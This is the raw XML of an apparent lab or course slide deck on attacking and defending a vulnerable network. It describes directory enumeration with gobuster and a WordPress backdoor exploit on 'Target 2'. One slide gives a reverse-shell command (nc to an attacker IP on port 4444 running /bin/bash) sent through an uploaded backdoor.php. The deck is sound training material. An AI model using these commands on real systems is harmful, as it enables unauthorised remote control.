                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Flag4 was found. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2385" name="Google Shape;2385;p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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2386" name="Google Shape;2386;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2387" name="Google Shape;2387;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2388" name="Google Shape;2388;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1058938" y="3984000"/>
          <a:ext cx="21995625" cy="6619785"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{D2EE18AC-DD6A-4FD0-9572-6E9059F1DDDE}</a:tableStyleId>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683850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1"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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1"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2613325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Enumeration</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-548: Exposure of Information Through Directory Listing</a:t>
                      </a:r>
                      <a:endParaRPr sz="5000" i="1">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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Used Gobuster to enumerate the wordpress directory</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1750" b="1">
                        <a:solidFill>
                          <a:srgbClr val="1D1C1D"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Cmd used: gobuster -w /usr/share/wordlists/distributer/directory-list-2.3-medium.txt dir -u 192.168.1.115</a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>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4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This allowed us access to the /vendor directory where flag 1 was located.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="50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2221025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Wordpress Arbitrary Command Execution</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="145000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1">
                          <a:solidFill>
                            <a:srgbClr val="2C2C2C"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1">
                          <a:solidFill>
                            <a:srgbClr val="33658A"/>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2007-1277</a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1" i="1">
                        <a:solidFill>
                          <a:srgbClr val="33658A"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="400"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="4400">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4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Upload file backdoor.php to Target 2 server through an ncat connection</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="F8F8F8"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Cmd used: 192.168.1.115/backdoor.php?cmd=nc 192.168.1.90 4444 -e /bin/bash</a:t>
                      </a:r>
                      <a:endParaRPr sz="5000" b="1" i="1">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This allowed us to directly execute bash commands on Target 2 server </a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">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pic>
        <p:nvPicPr>
          <p:cNvPr id="2393" name="Google Shape;2393;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914825" cy="12246447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394" name="Google Shape;2394;p8"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2395" name="Google Shape;2395;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2396" name="Google Shape;2396;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659500" cy="1612800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="731350" tIns="121850" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>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1551</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>226</Paragraphs>
  <Slides>28</Slides>
  <Notes>28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28</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="43" baseType="lpstr">
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Final Engagement Attack, Defense &amp; Analysis of a Vulnerable Network</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation 1: Users Enumeration      </vt:lpstr>
      <vt:lpstr>Exploitation 1: Users Enumeration    </vt:lpstr>
      <vt:lpstr>Exploitation 2: SSH Weak Password Vulnerability </vt:lpstr>
      <vt:lpstr>Exploitation 2: SSH Weak Password Vulnerability </vt:lpstr>
      <vt:lpstr>Exploitation 2: SSH Weak Password Vulnerability    </vt:lpstr>
      <vt:lpstr>Exploitation 3: WordPress Configuration File Exposed   </vt:lpstr>
      <vt:lpstr>Exploitation 3: WordPress Configuration File Exposed </vt:lpstr>
      <vt:lpstr>Exploitation 4: Privilege  Escalation  </vt:lpstr>
      <vt:lpstr>Exploitation 4: Privilege  Escalation  </vt:lpstr>
      <vt:lpstr>Exploitation 4: Privilege  Escalation  </vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of User Enumeration</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of User Enumeration </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Weak Password on SSH Port 22 </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Weak Password on SSH Port 22  </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Privilege  Escalation</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Privilege  Escalation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dc:title>
  <dc:creator>jeffrey pantoja</dc:creator>
  <cp:lastModifiedBy>jeffrey pantoja</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-18T06:13:16Z</dcterms:modified>
</cp:coreProperties>
</file>